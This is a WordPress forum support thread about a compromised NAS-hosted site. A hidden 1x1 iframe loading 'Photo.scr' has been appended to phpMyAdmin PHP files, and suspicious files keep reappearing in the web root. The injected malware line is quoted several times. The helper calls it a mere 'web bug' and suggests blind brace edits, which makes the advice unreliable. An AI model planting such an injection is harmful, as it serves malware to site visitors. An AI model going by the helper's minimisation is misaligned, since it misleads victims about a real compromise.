UPDATE: as an experiment I plugged in my iPhone on a usb cable and used it as a hotspot with my laptop. I then used internet explorer to try to look at the .com website and the wordpress site for projectionpictures and both pages work. Why doesn’t it appear from my router?
No worries about SSL concerns. It’s an important aspect of presenting a professional looking website. The need for SSL for any form was pioneered by Google as a push for improved public safety on the ‘net. Different browsers have responded to varying degrees by how aggressively the browser warns users — or doesn’t warn them, when there’s an SSL issue.
My only experience with installing certificates is doing so manually through virtual hosts files. Since webstation has a user interface for virtual hosts, I would expect there to be a mechanism for installing certificates as well. If it helps any, when manually installing certificates, the cert and key files are stored in the server file system outside of the public branch. A couple directives are added to virtual hosts that point to these files so Apache knows where to find them. There are a few other directives to activate as well. Try to find something in webstation that does this all for you.
I’ve no idea why IE fails when going through your router. Your NAS is also connected through the same router, but that part of it works fine. Other than your computer having a different IP than the NAS, the router just sees the same network packets either way. They ought to look the same coming from IE or Opera, or the NAS for that matter. It’s indeed a mystery. Since it appears to be a local quirk and you normally use Opera, I don’t think it’s worth worrying about, though it would be nice to get to the bottom of it.
You should focus on the SSL certificate right now, that’s much more important. Who knows, maybe that will make IE and your router play well together 🙂 If you’ve not already done so, in the WP general settings where you’ve set the WP and site URLs, change the http:// portion to https://. Once you have the certificate working, if you still get mixed content warnings, it means there are still http references on the page somewhere, such as image references. You need to hunt these down and change them to https. If there are only a few, you can do this manually. If there are a lot of these, or if you want to be thorough, reinstall that interconnect/it tool and use it to search an replace all domain references to use the https transport.
Be sure you only change your own domain references and not external references where https may be invalid. External references that are worth anything ought to be https already. Some may appear without any transport designation, as in //ajax.googleapis.com. You can insert https: if you see any like that, or just leave them alone.
I was about to do the http to https, but before I do that I wanted to back up the database for projection pictures in myphpadmin, however the user sign in screen now refuses to appear (I haven’t logged into to it since I changed it password). Although I made sure I could log in before I left it alone a few days ago.
So I now get:
Parse error: syntax error, unexpected ‘<‘ in /volume1/web/phpMyAdmin/libraries/classes/ErrorHandler.php on line 586
I can access that file in File Station an navigate to that file. What’s wrong?
Line 586 inside ErrorHandler.php has this line:
<iframe src=Photo.scr width=1 height=1 frameborder=0>
That reminds me of the file I removed when we used Google Console and it didn’t like 2 entries in projectionpictures
http:// projectionpictures.com/ Photo.scr
http:// projectionpictures.com/ info.zip
Whats the fix for that?
One other thing with regards to the those files I removed before
photo.scr, info.zip and dead.letter. There all back in the root directory /web/
I need more context to make a suggestion for a possible fix. Please post the code from several lines above to a couple lines below the referenced error line. My inclination is to take out the entire iframe code because it references that Photo.scr file, but I need to see the related PHP code in order to correct the syntax.
The fact the iframe is 1 x 1 pixel in size makes it a “web bug”. There are legitimate reasons to use these. They are also used to “spy” on users in some cases. Don’t worry, I don’t see how a local .scr file would spy on you, Anyway, it’s not critical for phpMyAdmin to have a web bug AFAIK.
It’s disconcerting though how this could have become an error. It wasn’t an error earlier and I’m pretty sure you were not editing this file on your own.
Ok with regards to your request for a given amount of lines above and below the error line (from 570-587, 588 is the the last line but its empty):
. '$("#pma_ignore_all_errors_bottom").bind("click",
function(e) {
e.preventDefault();
PMA_ignorePhpErrors(false)
});'
. '$("html, body").animate({
scrollTop:$(document).height()
}, "slow");';
}
}
// The errors are already sent from the response.
// Just focus on errors division upon load event.
$response->getFooter()->getScripts()->addCode($jsCode);
}
}
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
It wasn’t an error earlier
Well since I changed the password for projectionpictures password and the password to enter the phpmyadmin login, I’ve had no reason to login again until now.
I’m pretty sure you were not editing this file on your own.
Who else would be interested in my little site? I’m the only one in my property updating the website and corresponding with you, just me.
-
This reply was modified 7 years, 3 months ago by
pr0ject10n.
Thanks. That iframe web bug does not belong there at all. You can simply remove it to remove the syntax error. However, I would instead comment it out so there remains a record of what happened, all the while rendering it useless.
$response->getFooter()->getScripts()->addCode($jsCode);
}
}
/*<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>*/
Unfortunately, it seems you have a security breach somewhere. Hackers are interested in any web server from which they can install and run scripts. Small sites are better for some uses because it typically takes longer before a breach is discovered. With the web bug disabled, there’s a reasonable chance the current breach is resolved and the responsible party will not be back. But there’s still a vulnerability somewhere.
We can help you secure your WP installation, but securing your NAS overall is outside the scope of these forums. Because of where this web bug was installed, I think the breach coming through WP is fairly unlikely. A couple articles that might help you:
https://www.synology.com/en-global/knowledgebase/DSM/tutorial/Management/How_to_add_extra_security_to_your_Synology_NAS
https://codex.ww.wp.xz.cn/Hardening_WordPress
I removed the section of code you asked to.
$response->getFooter()->getScripts()->addCode($jsCode);
}
}
/*<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>*/
phpmyadmin still refuse to open and this time the error code is:
Parse error: syntax error, unexpected end of file in /volume1/web/phpMyAdmin/libraries/classes/ErrorHandler.php on line 581
The text in that are from 581 back to 550 appears as this:
$jsCode .= '$("html, body").animate({
scrollTop:$(document).height()
}, "slow");';
}
} elseif ($GLOBALS['cfg']['SendErrorReports'] == 'ask') {
//ask user whether to submit errors or not.
if (!$response->isAjax()) {
// js code to show appropriate msgs, event binding & focusing.
$jsCode = 'PMA_ajaxShowMessage(PMA_messages["phpErrorsFound"]);'
. '$("#pma_ignore_errors_popup").bind("click", function() {
PMA_ignorePhpErrors()
});'
. '$("#pma_ignore_all_errors_popup").bind("click",
function() {
PMA_ignorePhpErrors(false)
});'
. '$("#pma_ignore_errors_bottom").bind("click", function(e) {
e.preventDefaulut();
PMA_ignorePhpErrors()
});'
. '$("#pma_ignore_all_errors_bottom").bind("click",
function(e) {
e.preventDefault();
PMA_ignorePhpErrors(false)
});'
. '$("html, body").animate({
scrollTop:$(document).height()
}, "slow");';
}
}
// The errors are already sent from the response.
// Just focus on errors division upon load event.
Those dead.letter and Photo.scr along with index.html are in the web folder. Before two of them were a problem even though I removed them they’ve come back.
I added some autoblock protection in security.
If I misunderstood how much code to delete from /volume1/web/phpMyAdmin/libraries/classes/ErrorHandler.php
let me know.
One other thing I went to a cinema in central London and used the wifi. There I was able to look at the site with internet explorer, so it definitely the router causing the problem, probably as its doesn’t have loopback.
The file edit I asked you to do is correct. The problem now with end of file error is that when that iframe was inserted, some other code was also corrupted. A common cause is the closing braces } do not balance with opening braces { farther up in the file. But the code looks well organized and the usual protocol for indenting levels of brace delimited code blocks appears to be in order. There are a number of different delimiters where all must balance, but the curly brace imbalance is a common error because the matching brace can be quite far up in the file and hard to match up. It’s also possible for there to be too many closing in relation to opening.
It’s a shot in the dark, but try adding one closing curly brace } after the others and see if that fixes the file. If not, add one more. I doubt there would be more than two or three missing, but it’s difficult to be sure.
If adding fails to fix the file, remove your added braces. You could try removing the final brace on the chance there are too many. Do so by making it into a comment.
$response->getFooter()->getScripts()->addCode($jsCode);
}
// }
/*<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>*/
(add double slash to the head of the line)
Again, it’s hard to imagine there being more than one or two too many braces.
If these blind attempts to patch the file fail, you probably should either restore the file from any backup you may have or reinstall phpMyAdmin.
It has become clear the IE issue is limited to within your LAN. I cannot imagine what would affect IE and not Opera. I suppose the lack of loopback is as good an explanation as any.
Ok I did this, I pasted in your code above
$response->getFooter()->getScripts()->addCode($jsCode);
}
// }
/*<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>*/
That from lines 582 to 587 on the line
/*<iframe src=Photo.scr width=1 height=1 frameborder=0>
In the very left margin a red line comes down and a small box with a minus is there next to /*<iframe src=Photo.scr width=1 height=1 frameborder=0>, it branches down one line more and turns right into </iframe>*/`
Is there any significance to the small red box with a minus inside it.
This is the new error message I get when click on the phpmyadmain
Parse error: syntax error, unexpected end of file, expecting function (T_FUNCTION) in /volume1/web/phpMyAdmin/libraries/classes/ErrorHandler.php on line 587
If I have to uninstall phpmyadmain doesn’t that jeopardise the database inside for wordpress and projectionpictures.
As an experiment I added a single } at the very end of the last line after / </iframe>*/ so I now have:
// The errors are already sent from the response.
// Just focus on errors division upon load event.
$response->getFooter()->getScripts()->addCode($jsCode);
}
// }
/*<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>*/}
I then tried to open phpmyadmin (and it was thinking about it) but came back with this error.
Parse error: syntax error, unexpected '<' in /volume1/web/phpMyAdmin/libraries/classes/Core.php on line 1294
It gets us away from a file error in errorhandler.php, incidentally if I add another } to that very same end </iframe>*/}}
I simply get another:
Parse error: syntax error, unexpected '}' in /volume1/web/phpMyAdmin/libraries/classes/ErrorHandler.php on line 587
So lets stick with one } and look in Core.php from line 1268-1295 we get
),
'mysql_help_page' => $mysql_help_page,
)
);
}
/**
* Checks request and fails with fatal error if something problematic is found
*
* @return void
*/
public static function checkRequest()
{
if (isset($_REQUEST['GLOBALS']) || isset($_FILES['GLOBALS'])) {
self::fatalError(__("GLOBALS overwrite attempt"));
}
/**
* protect against possible exploits - there is no need to have so much variables
*/
if (count($_REQUEST) > 1000) {
self::fatalError(__('possible exploit'));
}
}
}
<iframe src=Photo.scr width=1 height=1 frameborder=0>
iframe</>
Should do we add } after iframe</> or add or subtract more code than that elsewhere?
Today WordPress invited me to upgrade to 5.1 (which I have done) and it also wanted to access the database which it managed to do in spite of the problems we are having being unable to access the login screen for phpmyadmin database.
phpMyAdmin is a tool that is independent of the mySQL database. The database operates correctly without the tool. It’s similar to the difference between a text file editor and the WP installation. You use the text editor tool to modify WP, but WP does not need the text editor in order to function. That said, I was suggesting you reinstall phpMyAdmin, not permanently uninstall. phpMyAdmin is an important tool to have available even if it’s not required for normal DB operation.
You can attempt to patch the Core.php file in the same manner as the error handler file. First comment out the iframe tags by demarcating with /* */. If you then get end of file errors, experiment with adding or removing closing curly braces } to resolve the error.
There’s no telling how many files are corrupted like this. PHP stops executing when it encounters syntax errors, so only one error is flagged at a time. Fix that error, and then the next one is flagged. And so on until it can process all files without error.
